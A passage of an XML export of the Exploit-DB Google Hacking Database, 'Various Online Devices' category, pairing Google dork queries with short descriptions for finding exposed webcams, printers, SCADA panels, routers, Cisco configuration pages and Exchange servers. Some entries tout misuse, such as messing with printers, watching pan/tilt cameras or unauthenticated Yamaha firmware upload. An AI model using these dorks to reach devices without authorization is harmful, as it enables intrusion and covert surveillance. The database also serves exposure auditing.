<textualDescription>Tivo is a the digital replacement for your analog videorecorder. It's a digital media system that amongst other things allows recording tv shows to a hard disk. More information is available at http://www.tivo.com.This search was found in one of those cgi scanning tools out there. Currently there are only two results and only the first responds with information like this:1.0Sat Oct 16 15:26:46 EDT 2004JavaHMO1.0Leon Nicholls-This is an official build. Identifier: 2003.03.25-1612 Last Change: 112792In the future vulnerabilities may be found in this software. For now an attacker can enjoy the mp3 stream it provides (copy the server:port in winamp or xmms).</textualDescription>
<query>inurl:TiVoConnect?Command=QueryServer</query>
<querystring>https://www.google.com/search?q=inurl%3ATiVoConnect%3FCommand%3DQueryServer</querystring>
<edb></edb>
<date>2004-10-18</date>
<author>anonymous</author>
</entry>
<entry>
<id>7027</id>
<link>https://www.exploit-db.com/ghdb/7027</link>
<category>Various Online Devices</category>
<shortDescription>inurl:top.cgi intitle:&quot;Motorola ptp&quot;</shortDescription>
<textualDescription># Google Dork: inurl:top.cgi intitle:&quot;Motorola ptp&quot;
# Category: Various Online Devices
# Date: 05/07/2021
# Exploit Author: s Thakur
</textualDescription>
<query>inurl:top.cgi intitle:&quot;Motorola ptp&quot;</query>
<querystring>https://www.google.com/search?q=inurl:top.cgi intitle:&quot;Motorola ptp&quot;</querystring>
<edb></edb>
<date>2021-07-21</date>
<author>s Thakur</author>
</entry>
<entry>
<id>4303</id>
<link>https://www.exploit-db.com/ghdb/4303</link>
<category>Various Online Devices</category>
<shortDescription>inurl:top.htm inurl:currenttime</shortDescription>
<textualDescription>Dork with a lot of cameras online.
Enjoy Healthy.
Regards.
Dork by Rootkit Pentester.</textualDescription>
<query>inurl:top.htm inurl:currenttime</query>
<querystring>https://www.google.com/search?q=inurl:top.htm inurl:currenttime</querystring>
<edb></edb>
<date>2016-06-29</date>
<author>anonymous</author>
</entry>
<entry>
<id>5185</id>
<link>https://www.exploit-db.com/ghdb/5185</link>
<category>Various Online Devices</category>
<shortDescription>inurl:TOP/PRTINFO.HTML</shortDescription>
<textualDescription>inurl:TOP/PRTINFO.HTML
Found Epson printer without password administrator.
My name : EJUPI Békim</textualDescription>
<query>inurl:TOP/PRTINFO.HTML</query>
<querystring>https://www.google.com/search?q=inurl:TOP/PRTINFO.HTML</querystring>
<edb></edb>
<date>2019-04-22</date>
<author>EJUPI Békim</author>
</entry>
<entry>
<id>4139</id>
<link>https://www.exploit-db.com/ghdb/4139</link>
<category>Various Online Devices</category>
<shortDescription>inurl:trafficcams -intext:trafficcams ext:asp OR ext:htm</shortDescription>
<textualDescription>Dork who show cams of traffic of a lot of cities.
Dork By Rootkit Pentester.</textualDescription>
<query>inurl:trafficcams -intext:trafficcams ext:asp OR ext:htm</query>
<querystring>https://www.google.com/search?q=inurl:trafficcams -intext:trafficcams ext:asp OR ext:htm</querystring>
<edb></edb>
<date>2015-11-26</date>
<author>anonymous</author>
</entry>
<entry>
<id>4004</id>
<link>https://www.exploit-db.com/ghdb/4004</link>
<category>Various Online Devices</category>
<shortDescription>inurl:upsstats.cgi?host</shortDescription>
<textualDescription>UPS Online Devices. Enjoy!!!.
By Rootkit.</textualDescription>
<query>inurl:upsstats.cgi?host</query>
<querystring>https://www.google.com/search?q=inurl:upsstats.cgi?host</querystring>
<edb></edb>
<date>2015-05-18</date>
<author>anonymous</author>
</entry>
<entry>
<id>4261</id>
<link>https://www.exploit-db.com/ghdb/4261</link>
<category>Various Online Devices</category>
<shortDescription>inurl:userRpm inurl:LoginRpm.htm</shortDescription>
<textualDescription>The below dork can list all the TPLink routers available.inurl:userRpm inurl:LoginRpm.htm
Regards,
Srini</textualDescription>
<query>inurl:userRpm inurl:LoginRpm.htm</query>
<querystring>https://www.google.com/search?q=inurl:userRpm inurl:LoginRpm.htm</querystring>
<edb></edb>
<date>2016-04-11</date>
<author>anonymous</author>
</entry>
<entry>
<id>5847</id>
<link>https://www.exploit-db.com/ghdb/5847</link>
<category>Various Online Devices</category>
<shortDescription>inurl:view.shtml</shortDescription>
<textualDescription>Category: Various Online Devices
Nicholas Doropoulos
</textualDescription>
<query>inurl:view.shtml</query>
<querystring>https://www.google.com/search?q=inurl:view.shtml</querystring>
<edb></edb>
<date>2020-03-30</date>
<author>Nicholas Doropoulos</author>
</entry>
<entry>
<id>8019</id>
<link>https://www.exploit-db.com/ghdb/8019</link>
<category>Various Online Devices</category>
<shortDescription>inurl:viewer/live/index.html</shortDescription>
<textualDescription># Google Dork: inurl:viewer/live/index.html
# Date: 08/04/22
# Category : Various Online Devices
# Exploit Author: Palvinder Singh Secuneus
# Version: WV-SW175</textualDescription>
<query>inurl:viewer/live/index.html</query>
<querystring>https://www.google.com/search?q=inurl:viewer/live/index.html</querystring>
<edb></edb>
<date>2022-08-17</date>
<author>Palvinder Singh Secuneus</author>
</entry>
<entry>
<id>5450</id>
<link>https://www.exploit-db.com/ghdb/5450</link>
<category>Various Online Devices</category>
<shortDescription>inurl:webArch/mainFrame filetype:cgi intext:&quot;Web Image Monitor&quot;</shortDescription>
<textualDescription>Dork: inurl:webArch/mainFrame filetype:cgi intext:&quot;Web Image Monitor&quot;
Author: M. Cory Billington
Info: Web portals for Ricoh printers/copiers/multifunction machines
</textualDescription>
<query>inurl:webArch/mainFrame filetype:cgi intext:&quot;Web Image Monitor&quot;</query>
<querystring>https://www.google.com/search?q=inurl:webArch/mainFrame filetype:cgi intext:&quot;Web Image Monitor&quot;</querystring>
<edb></edb>
<date>2019-08-26</date>
<author>M. Cory Billington</author>
</entry>
<entry>
<id>7927</id>
<link>https://www.exploit-db.com/ghdb/7927</link>
<category>Various Online Devices</category>
<shortDescription>inurl:webcam site:skylinewebcams.com inurl:roma</shortDescription>
<textualDescription># Google Dork: inurl:webcam site:skylinewebcams.com inurl:roma
# Various Online Devices
# Date:11/02/2022
# Exploit Author: Simone Gasparato</textualDescription>
<query>inurl:webcam site:skylinewebcams.com inurl:roma</query>
<querystring>https://www.google.com/search?q=inurl:webcam site:skylinewebcams.com inurl:roma</querystring>
<edb></edb>
<date>2022-06-17</date>
<author>Simone Gasparato</author>
</entry>
<entry>
<id>4089</id>
<link>https://www.exploit-db.com/ghdb/4089</link>
<category>Various Online Devices</category>
<shortDescription>inurl:webvisu.htm ext:htm</shortDescription>
<textualDescription>Google dork Description: View SCADA web visual interface
Google search: inurl:webvisu.htm ext:htm
Submited: 2015-10-8
Note:
SCADA web visual. - Yudha[at]glosmon.com</textualDescription>
<query>inurl:webvisu.htm ext:htm</query>
<querystring>https://www.google.com/search?q=inurl:webvisu.htm ext:htm</querystring>
<edb></edb>
<date>2015-10-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1410</id>
<link>https://www.exploit-db.com/ghdb/1410</link>
<category>Various Online Devices</category>
<shortDescription>inurl:wrcontrollite</shortDescription>
<textualDescription>Browse up to 16 security cameras at one time :)</textualDescription>
<query>inurl:wrcontrollite</query>
<querystring>https://www.google.com/search?q=inurl:wrcontrollite&amp;filter=0</querystring>
<edb></edb>
<date>2006-09-11</date>
<author>anonymous</author>
</entry>
<entry>
<id>4387</id>
<link>https://www.exploit-db.com/ghdb/4387</link>
<category>Various Online Devices</category>
<shortDescription>inurl:~/ftp://193 filetype:(php | txt | html | asp | xml | cnf | sh) ~'/html'</shortDescription>
<textualDescription>Dork:
Find a List of FTP Servers by IP address, mostly Windows NT servers with
guest login capabilities.
Example:
inurl:~/ftp://193 filetype:(php | txt | html | asp | xml | cnf | sh)
~'/html' -'pub' -'public' -'mp3' -fossies -websvn -svn -git -login -.de
-.fl -.ru -.jp -.kr -.ch -.dk -.edu -dorks -google -Google -.gov -prevent
-help -how -reset -your -developer -reference -support -github admin
Anything with &quot;-&quot; in the beginning is used to help combat the fact that
google does not really want us to see all of the results. If we do not
filter through, google will mark us as a bot user and block our ip address.
The &quot;do not search&quot; expression is as important as the term or phrase we
wish to search and match for.
Thanks,
MrM</textualDescription>
<query>inurl:~/ftp://193 filetype:(php | txt | html | asp | xml | cnf | sh) ~'/html'</query>
<querystring>https://www.google.com/search?q=inurl:~/ftp://193 filetype:(php | txt | html | asp | xml | cnf | sh) ~'/html'</querystring>
<edb></edb>
<date>2017-01-23</date>
<author>anonymous</author>
</entry>
<entry>
<id>515</id>
<link>https://www.exploit-db.com/ghdb/515</link>
<category>Various Online Devices</category>
<shortDescription>Konica Network Printer Administration</shortDescription>
<textualDescription>This finds Konica Network Printer Administration pages. There is one result at the time of writing.</textualDescription>
<query>intitle:&quot;network administration&quot; inurl:&quot;nic&quot;</query>
<querystring>https://www.google.com/search?q=intitle%3A%22network+administration%22+inurl%3A%22nic%22</querystring>
<edb></edb>
<date>2004-09-29</date>
<author>anonymous</author>
</entry>
<entry>
<id>315</id>
<link>https://www.exploit-db.com/ghdb/315</link>
<category>Various Online Devices</category>
<shortDescription>Mobotix netcams</shortDescription>
<textualDescription>Mobotix netcams use the thttpd-2.x. server (http://www.acme.com/software/thttpd/). The latest version today is 2.25b, but most cams run older versions. They produce a rather nice image quality.Moderator note: this search was found by L0om and cleaned up by Wolveso.</textualDescription>
<query>(intext:&quot;MOBOTIX M1&quot; | intext:&quot;MOBOTIX M10&quot;) intext:&quot;Open Menu&quot; Shift-Reload</query>
<querystring>https://www.google.com/search?q=%28intext%3A%22MOBOTIX+M1%22+%7C+intext%3A%22MOBOTIX+M10%22%29+intext%3A%22Open+Menu%22+Shift-Reload</querystring>
<edb></edb>
<date>2004-07-10</date>
<author>anonymous</author>
</entry>
<entry>
<id>512</id>
<link>https://www.exploit-db.com/ghdb/512</link>
<category>Various Online Devices</category>
<shortDescription>More Axis netcams !</shortDescription>
<textualDescription>More Axis Netcams, this search combines the cams with the default title (Live View) and extends it by searching for the &quot;view/view.shtml&quot; URL identifier. Models found with this search are:AXIS 205 version 4.02AXIS 206M Network Camera version 4.10AXIS 206W Network Camera version 4.10AXIS 211 Network Camera version 4.02AXIS 241S Video Server version 4.02AXIS 241Q Video Server version 4.01Axis 2100 Network CameraAxis 2110 Network Camera 2.34Axis 2120 Network Camera 2.40AXIS 2130R PTZ Network Camera</textualDescription>
<query>intitle:&quot;Live View / - AXIS&quot; | inurl:view/view.sht</query>
<querystring>https://www.google.com/search?q=intitle%3A%22Live+View+%2F+-+AXIS%22+%7C+inurl%3Aview%2Fview.shtml%5E</querystring>
<edb></edb>
<date>2004-09-29</date>
<author>anonymous</author>
</entry>
<entry>
<id>311</id>
<link>https://www.exploit-db.com/ghdb/311</link>
<category>Various Online Devices</category>
<shortDescription>Panasonic Network Cameras</shortDescription>
<textualDescription>Panasonic Network Cameras can be viewed and controlled from a standard web browser. These cameras can be placed anywhere to keep an eye on things, with no PC required on the location. Check for more information: http://www.panasonic.com/netcam/There is a htaccess protected admin page at &quot;http://[target-ip]/config.html&quot; on the target device. Admin logins have no defaults, but created during setup.</textualDescription>
<query>inurl:&quot;ViewerFrame?Mode=&quot;</query>
<querystring>https://www.google.com/search?q=inurl%3A%22ViewerFrame%3FMode%3D%22&amp;btnG=Google+Search</querystring>
<edb></edb>
<date>2004-07-10</date>
<author>anonymous</author>
</entry>
<entry>
<id>316</id>
<link>https://www.exploit-db.com/ghdb/316</link>
<category>Various Online Devices</category>
<shortDescription>Panasonic WJ-NT104 netcams</shortDescription>
<textualDescription>The Panasonic WJ-NT104 allows easy monitoring with a conventional browser. More vendor information is available at hxxp://www.panasonic.ca/English/Broadcast/security/transmission/wjnt104.asp</textualDescription>
<query>intitle:&quot;WJ-NT104 Main Page&quot;</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;q=intitle%3A%22WJ-NT104+Main+Page%22</querystring>
<edb></edb>
<date>2004-07-10</date>
<author>anonymous</author>
</entry>
<entry>
<id>1122</id>
<link>https://www.exploit-db.com/ghdb/1122</link>
<category>Various Online Devices</category>
<shortDescription>Phaser numrange:100-100000 Name DNS IP &quot;More Printers&quot; index help filetype:html | filetype:shtml</shortDescription>
<textualDescription>This is a search for various phaser network printers. With this search you can look for printers to print test/help pages, monitor the printer, and generally mess with people.</textualDescription>
<query>Phaser numrange:100-100000 Name DNS IP &quot;More Printers&quot; index help filetype:html | filetype:shtml</query>
<querystring>https://www.google.com/search?q=Phaser+numrange%3A100-100000+Name+DNS+IP+%22More+Printers%22+index+help+filetype%3Ahtml+%7C+filetype%3Ashtml</querystring>
<edb></edb>
<date>2005-09-21</date>
<author>anonymous</author>
</entry>
<entry>
<id>402</id>
<link>https://www.exploit-db.com/ghdb/402</link>
<category>Various Online Devices</category>
<shortDescription>Phasers 4500/6250/8200/8400</shortDescription>
<textualDescription>More Xerox printers (Phasers 4500/6250/8200/8400). An attacker can access the webinterface with this search.</textualDescription>
<query>intext:centreware inurl:status</query>
<querystring>https://www.google.com/search?q=intext%3Acentreware+inurl%3Astatus</querystring>
<edb></edb>
<date>2004-08-05</date>
<author>anonymous</author>
</entry>
<entry>
<id>1015</id>
<link>https://www.exploit-db.com/ghdb/1015</link>
<category>Various Online Devices</category>
<shortDescription>printers/printman.html</shortDescription>
<textualDescription>some interesting information on printer status including Name, Location, Model, Pagecount, Action, Status. This summary page also presents several printers in one list, and the status logs reveal more sensitive information like email addresses.</textualDescription>
<query>printers/printman.html</query>
<querystring>https://www.google.com/search?q=printers%2Fprintman.html&amp;btnG=Google+Search</querystring>
<edb></edb>
<date>2005-06-07</date>
<author>anonymous</author>
</entry>
<entry>
<id>313</id>
<link>https://www.exploit-db.com/ghdb/313</link>
<category>Various Online Devices</category>
<shortDescription>seyeon FlexWATCH cameras</shortDescription>
<textualDescription>seyeon provides various type of products and software to build up a remote video monitoring and surveillance system over the TCP/IP network. FlexWATCHâââ¬Å¾Ã¢ Network video server series has built-in Web server based on TCP/IP technology. It also has an embedded RTOS.The admin pages are at http://[sitename]/admin/aindex.htm.</textualDescription>
<query>intitle:flexwatch intext:&quot;Home page ver&quot;</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;q=intitle%3Aflexwatch+intext%3A%22Home+page+ver%22</querystring>
<edb></edb>
<date>2004-07-10</date>
<author>anonymous</author>
</entry>
<entry>
<id>6820</id>
<link>https://www.exploit-db.com/ghdb/6820</link>
<category>Various Online Devices</category>
<shortDescription>site:*.*/level/15/exec/-/ &quot;Exec Configure&quot;</shortDescription>
<textualDescription># Google Dork: site:*.*/level/15/exec/-/ &quot;Exec Configure&quot;
# Various online devices (Cisco).
# Date: 03/03/2021
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>site:*.*/level/15/exec/-/ &quot;Exec Configure&quot;</query>
<querystring>https://www.google.com/search?q=site:*.*/level/15/exec/-/ &quot;Exec Configure&quot;</querystring>
<edb></edb>
<date>2021-03-03</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>5754</id>
<link>https://www.exploit-db.com/ghdb/5754</link>
<category>Various Online Devices</category>
<shortDescription>site:*/cgi-bin/webproc intext:&quot;username&quot;</shortDescription>
<textualDescription>Online devices:
site:*/cgi-bin/webproc intext:&quot;username&quot;
Reza Abasi(Turku)
</textualDescription>
<query>site:*/cgi-bin/webproc intext:&quot;username&quot;</query>
<querystring>https://www.google.com/search?q=site:*/cgi-bin/webproc intext:&quot;username&quot;</querystring>
<edb></edb>
<date>2020-02-26</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>6767</id>
<link>https://www.exploit-db.com/ghdb/6767</link>
<category>Various Online Devices</category>
<shortDescription>site:*/dyn_sensors.htm &quot;ID&quot;</shortDescription>
<textualDescription># Google Dork: site:*/dyn_sensors.htm &quot;ID&quot;
# Various online devices.
# Date: 27/1/2021
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>site:*/dyn_sensors.htm &quot;ID&quot;</query>
<querystring>https://www.google.com/search?q=site:*/dyn_sensors.htm &quot;ID&quot;</querystring>
<edb></edb>
<date>2021-02-01</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>6041</id>
<link>https://www.exploit-db.com/ghdb/6041</link>
<category>Various Online Devices</category>
<shortDescription>site:*/EWS/Exchange.asmx</shortDescription>
<textualDescription>Author: MiningOmerta
Finds indexed Microsoft Exchange Servers (Includes Office 365) for e-mail synchronization.
site:*/EWS/Exchange.asmx
link:
https://www.google.com/search?q=site%3A*%2FEWS%2FExchange.asmx
or
https://www.google.com/search?q=site%3A*%2FEWS%2FExchange.asmx+-contoso
if you dont want the “Hello World” of Microsoft Domains :)
</textualDescription>
<query>site:*/EWS/Exchange.asmx</query>
<querystring>https://www.google.com/search?q=site:*/EWS/Exchange.asmx</querystring>
<edb></edb>
<date>2020-05-06</date>
<author>MiningOmerta</author>
</entry>
<entry>
<id>6889</id>
<link>https://www.exploit-db.com/ghdb/6889</link>
<category>Various Online Devices</category>
<shortDescription>site:*/net/net/protocol.html</shortDescription>
<textualDescription># Google Dork: site:*/net/net/protocol.html
# Various online devices (printers).
# Date: 16/04/2021
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>site:*/net/net/protocol.html</query>
<querystring>https://www.google.com/search?q=site:*/net/net/protocol.html</querystring>
<edb></edb>
<date>2021-04-19</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>6833</id>
<link>https://www.exploit-db.com/ghdb/6833</link>
<category>Various Online Devices</category>
<shortDescription>site:*/tcpipv4.htm</shortDescription>
<textualDescription># Google Dork: site:*/tcpipv4.htm
# Various online devices.
# Date: 17/03/2021
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>site:*/tcpipv4.htm</query>
<querystring>https://www.google.com/search?q=site:*/tcpipv4.htm</querystring>
<edb></edb>
<date>2021-03-18</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>6847</id>
<link>https://www.exploit-db.com/ghdb/6847</link>
<category>Various Online Devices</category>
<shortDescription>site:*/tcpipv6.htm</shortDescription>
<textualDescription># Google Dork: site:*/tcpipv6.htm
# Various online devices.
# Date: 23/03/2021
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>site:*/tcpipv6.htm</query>
<querystring>https://www.google.com/search?q=site:*/tcpipv6.htm</querystring>
<edb></edb>
<date>2021-03-29</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>590</id>
<link>https://www.exploit-db.com/ghdb/590</link>
<category>Various Online Devices</category>
<shortDescription>site:.viewnetcam.com -www.viewnetcam.com</shortDescription>
<textualDescription>The FREE viewnetcam.com service allows you to create a personal web address (e.g., http://bob.viewnetcam.com) at which your camera's live image can be found on the Internet. How the camera and service works: Special Software embedded within your Panasonic Network Camera gives your camera the ability to locate your unique Internet address. No matter what kind of Internet connection you have or which Internet provider you use, the viewnetcam.com service will keep your camera's Internet address permanent.</textualDescription>
<query>site:.viewnetcam.com -www.viewnetcam.com</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;q=site%3A.viewnetcam.com+-www.viewnetcam.com</querystring>
<edb></edb>
<date>2004-10-19</date>
<author>anonymous</author>
</entry>
<entry>
<id>5169</id>
<link>https://www.exploit-db.com/ghdb/5169</link>
<category>Various Online Devices</category>
<shortDescription>site:azurewebsites.net inurl:.gov | .mil | .edu</shortDescription>
<textualDescription>*Google Dork:* site:azurewebsites.net inurl:.gov | .mil | .edu
*Description: *Here is a Google Dork that reveals a large footprint of all
.gov, .edu, and, .mil websites that are hosted and setup on Microsofts
Azure cloud platform.
*By:* edm0nd
https://twitter.com/Edmond_Major
</textualDescription>
<query>site:azurewebsites.net inurl:.gov | .mil | .edu</query>
<querystring>https://www.google.com/search?q=site:azurewebsites.net inurl:.gov | .mil | .edu</querystring>
<edb></edb>
<date>2019-04-03</date>
<author>edm0nd</author>
</entry>
<entry>
<id>4955</id>
<link>https://www.exploit-db.com/ghdb/4955</link>
<category>Various Online Devices</category>
<shortDescription>site:drive.google.com /preview intext:movie inurl:flv | wmv | mp4 -pdf -edit -view</shortDescription>
<textualDescription># Google Dork: site:drive.google.com /preview intext:movie inurl:flv | wmv | mp4 -pdf -edit -view
# Date: 2018-09-15
# Author: Akalanka Ekanayake (Jake Logan)
# Vendor Homepage: https://securehacker.co.uk
This dork will help you to find out videos published in Google
drive.(Movies,Tv series,clips .etc)
Example :
site:drive.google.com /preview *intext:tv series* inurl:flv | wmv |
mp4 -pdf -edit -view
site:drive.google.com /preview *intext:tutorial* inurl:flv | wmv | mp4
-pdf -edit -view
site:drive.google.com /preview *intext:720p *inurl:flv | wmv | mp4
-pdf -edit -view
</textualDescription>
<query>site:drive.google.com /preview intext:movie inurl:flv | wmv | mp4 -pdf -edit -view</query>
<querystring>https://www.google.com/search?q=site:drive.google.com /preview intext:movie inurl:flv | wmv | mp4 -pdf -edit -view</querystring>
<edb></edb>
<date>2018-09-17</date>
<author>Akalanka Ekanayake</author>
</entry>
<entry>
<id>5408</id>
<link>https://www.exploit-db.com/ghdb/5408</link>
<category>Various Online Devices</category>
<shortDescription>site:member.*.*/auth/login</shortDescription>
<textualDescription>Login Pages:
site:member.*.*/auth/login
site:members.*.*/auth/login
site:portal.*.*/auth/login
site:user.*.*/auth/login
Reza Abasi(Turku)
</textualDescription>
<query>site:member.*.*/auth/login</query>
<querystring>https://www.google.com/search?q=site:member.*.*/auth/login</querystring>
<edb></edb>
<date>2019-08-20</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>4371</id>
<link>https://www.exploit-db.com/ghdb/4371</link>
<category>Various Online Devices</category>
<shortDescription>site:webex.com inurl:tc3000</shortDescription>
<textualDescription>This dorks can access to some meetings information.
site:webex.com inurl:tc3000
site:webex.com inurl:siteurl=meetings</textualDescription>
<query>site:webex.com inurl:tc3000</query>
<querystring>https://www.google.com/search?q=site:webex.com inurl:tc3000</querystring>
<edb></edb>
<date>2016-12-08</date>
<author>anonymous</author>
</entry>
<entry>
<id>3954</id>
<link>https://www.exploit-db.com/ghdb/3954</link>
<category>Various Online Devices</category>
<shortDescription>SiteScope inurl:/SiteScope/cgi/go.exe/SiteScope?page=</shortDescription>
<textualDescription>inurl:/SiteScope/cgi/go.exe/SiteScope?page=
twitter
@firebitsbr</textualDescription>
<query>dorks:SiteScope inurl:/SiteScope/cgi/go.exe/SiteScope?page=</query>
<querystring>https://www.google.com/search?q=SiteScope inurl:/SiteScope/cgi/go.exe/SiteScope?page=</querystring>
<edb></edb>
<date>2014-07-03</date>
<author>anonymous</author>
</entry>
<entry>
<id>314</id>
<link>https://www.exploit-db.com/ghdb/314</link>
<category>Various Online Devices</category>
<shortDescription>sony SNC-RZ20 network cameras</shortDescription>
<textualDescription>sony NC RZ20 cameras, only one result for this cam at the moment, a nice street view from a skyscraper.</textualDescription>
<query>intitle:snc-z20 inurl:home/</query>
<querystring>https://www.google.com/search?q=intitle%3Asnc-z20+inurl%3Ahome%2F+&amp;btnG=Google+Search</querystring>
<edb></edb>
<date>2004-07-10</date>
<author>anonymous</author>
</entry>
<entry>
<id>312</id>
<link>https://www.exploit-db.com/ghdb/312</link>
<category>Various Online Devices</category>
<shortDescription>sony SNC-RZ30 Network Cameras</shortDescription>
<textualDescription>sony NC RZ30 camera's require a java capable browser. The admin panel is found at http://[sitename]/home/l4/admin.html.</textualDescription>
<query>sNC-RZ30 HOME</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;q=intitle%3Asnc-rz30+inurl%3Ahome%2F+</querystring>
<edb></edb>
<date>2004-07-10</date>
<author>anonymous</author>
</entry>
<entry>
<id>1029</id>
<link>https://www.exploit-db.com/ghdb/1029</link>
<category>Various Online Devices</category>
<shortDescription>tilt intitle:&quot;Live View / - AXIS&quot; | inurl:view/view.shtml</shortDescription>
<textualDescription>A small modification to the AXIS camera search - it now returns cameras with pan / tilt, which is much more fun!</textualDescription>
<query>tilt intitle:&quot;Live View / - AXIS&quot; | inurl:view/view.shtml</query>
<querystring>https://www.google.com/search?c2coff=1&amp;q=tilt+intitle%3A%22Live+View+%2F+-+AXIS%22+%7C+inurl%3Aview%2Fview.shtml</querystring>
<edb></edb>
<date>2005-07-07</date>
<author>anonymous</author>
</entry>
<entry>
<id>7963</id>
<link>https://www.exploit-db.com/ghdb/7963</link>
<category>Various Online Devices</category>
<shortDescription>Various Online Devices Dork</shortDescription>
<textualDescription># Google Dork: inurl /view.shtml intext:&quot;Beach&quot;
# Various Online Devices
# Date:7/06/2022
# Exploit Author: isa ghojaria</textualDescription>
<query>Various Online Devices Dork</query>
<querystring>https://www.google.com/search?q=Various Online Devices Dork</querystring>
<edb></edb>
<date>2022-07-06</date>
<author>isa ghojaria</author>
</entry>
<entry>
<id>650</id>
<link>https://www.exploit-db.com/ghdb/650</link>
<category>Various Online Devices</category>
<shortDescription>WebControl intitle:&quot;AMX NetLinx&quot;</shortDescription>
<textualDescription>AMX Netlink is a server appliance which connects various devices like a beamer, laptop or video recorder to the internet.</textualDescription>
<query>WebControl intitle:&quot;AMX NetLinx&quot;</query>
<querystring>https://www.google.com/search?q=WebControl+intitle%3A%22AMX+NetLinx%22&amp;c2coff=1&amp;client=firefox</querystring>
<edb></edb>
<date>2004-11-06</date>
<author>anonymous</author>
</entry>
<entry>
<id>939</id>
<link>https://www.exploit-db.com/ghdb/939</link>
<category>Various Online Devices</category>
<shortDescription>Winamp Web Interface</shortDescription>
<textualDescription>Just a bit of fun, should reveal a few instances of a Winamp HTTP control program. Without login, you can't do much except see the currently playing track. With login you can have a bit more fun by changing the volume, currently playing track, viewing playlists, etc. With admin access you can delete tracks... I'll leave it to others to find out if anything cool can be done with this.Just a note, you *can't* hear the music the person is playing, it's not a stream interface, just a control interface.</textualDescription>
<query>&quot;About Winamp Web Interface&quot; intitle:&quot;Winamp Web Interface&quot;</query>
<querystring>https://www.google.com/search?q=%22About+Winamp+Web+Interface%22+intitle%3A%22Winamp+Web+Interface%22</querystring>
<edb></edb>
<date>2005-04-11</date>
<author>anonymous</author>
</entry>
<entry>
<id>362</id>
<link>https://www.exploit-db.com/ghdb/362</link>
<category>Various Online Devices</category>
<shortDescription>Xerox Phaser 6250</shortDescription>
<textualDescription>Base Specifications Phaser 6250N: Letter/Legal Size Color Printer 110V, 26ppm Color/B&amp;W (24ppm A4 Color/B&amp;W), 2400dpi, 700MHz Processor, Ethernet, 256MB Memory, Photo Quality Mode, Network Feature SetPassword not allways needed it seems, depends on admin setup..</textualDescription>
<query>&quot;Phaser 6250&quot; &quot;Printer Neighborhood&quot; &quot;XEROX CORPORATION&quot;</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;q=%22Phaser+6250%22+%22Printer+Neighborhood%22+%22XEROX+CORPORATION%22</querystring>
<edb></edb>
<date>2004-07-22</date>
<author>anonymous</author>
</entry>
<entry>
<id>364</id>
<link>https://www.exploit-db.com/ghdb/364</link>
<category>Various Online Devices</category>
<shortDescription>Xerox Phaser 8200</shortDescription>
<textualDescription>Brochure info: &quot;The Phaser 8200 uses solid ink, an alternative technology to laser printing. Unlike typical laser printers, solid ink doesn't require throwaway cartridges to get ink in the printer.&quot; Using the Internet, your printer can send performance information to our computers. PhaserSMART, our diagnostic system, examines the information, diagnoses the issue, and immediately walks you through a proposed solution. Automatic alerts minimize printer management problems. Alerts notify you via email when it's time to replace supplies, or when service is required.&quot;Moderator note: you may not be able to connect to the links Google gives if the printers are turned off when not in use.</textualDescription>
<query>&quot;Phaser 8200&quot; &quot;© Xerox&quot; &quot;refresh&quot; &quot; Email Alerts&quot;</query>
<querystring>https://www.google.com/search?q=%22Phaser+8200%22+%22%C2%A9+Xerox%22+%22refresh%22+%22+Email+Alerts%22&amp;filter=0</querystring>
<edb></edb>
<date>2004-07-22</date>
<author>anonymous</author>
</entry>
<entry>
<id>363</id>
<link>https://www.exploit-db.com/ghdb/363</link>
<category>Various Online Devices</category>
<shortDescription>Xerox PhaserÂî 740 Color Printer</shortDescription>
<textualDescription>This product is supported but no longer sold by Xerox in the United States. Replacement Product: Phaserâââ¬Å¾Ã¢ 6250.Configuration pages are password protected.</textualDescription>
<query>&quot;PhaserÂî 740 Color Printer&quot; &quot;printer named: &quot;</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;q=%22Phaser%C2%AE+740+Color+Printer%22+%22printer+named%3A+%22</querystring>
<edb></edb>
<date>2004-07-22</date>
<author>anonymous</author>
</entry>
<entry>
<id>365</id>
<link>https://www.exploit-db.com/ghdb/365</link>
<category>Various Online Devices</category>
<shortDescription>Xerox PhaserÂî 840 Color Printer</shortDescription>
<textualDescription>This product is supported but no longer sold by Xerox in the United States. Support and supplies for this product continue to be available online. Replacement Product: Phaserâââ¬Å¾Ã¢ 8400This search finds the PhaserLinkTM Printer Management Software for the PhaserÂî 840 Color Printer. It seems at least the &quot;Print DEMO&quot; page works without authentication.</textualDescription>
<query>&quot;PhaserÂî 840 Color Printer&quot; &quot;Current Status&quot; &quot;printer named:&quot;</query>
<querystring>https://www.google.com/search?q=%22Phaser%C2%AE+840+Color+Printer%22+%22Current+Status%22+%22printer+named:%22</querystring>
<edb></edb>
<date>2004-07-22</date>
<author>anonymous</author>
</entry>
<entry>
<id>7392</id>
<link>https://www.exploit-db.com/ghdb/7392</link>
<category>Various Online Devices</category>
<shortDescription>©20 &quot;Copyright Yamaha Corporation Visit&quot;</shortDescription>
<textualDescription># Google Dork: ©20 &quot;Copyright Yamaha Corporation Visit&quot;
# Various Online Devices
# Date: 28/09/2021
# Exploit Author: MiningOmerta
This dorks finds Yamaha Systems that can be controlled and configured remotely. Unauthenticated access to various Yamaha devices. While unauthenticated (no prompt for authentication), one has the ability to upload firmware, remotely interact with devices from the URL (http://ip.addr/index.html?zone=0&amp;foo=1), alter network and name settings, AirPlay and wifi password disclosure, change network settings to something other than they are, dissect firmware via backup, etc. There is also disclosure of the devices internal IP address in the network settings.
</textualDescription>
<query>©20 &quot;Copyright Yamaha Corporation Visit&quot;</query>
<querystring>https://www.google.com/search?q=©20 &quot;Copyright Yamaha Corporation Visit&quot;</querystring>
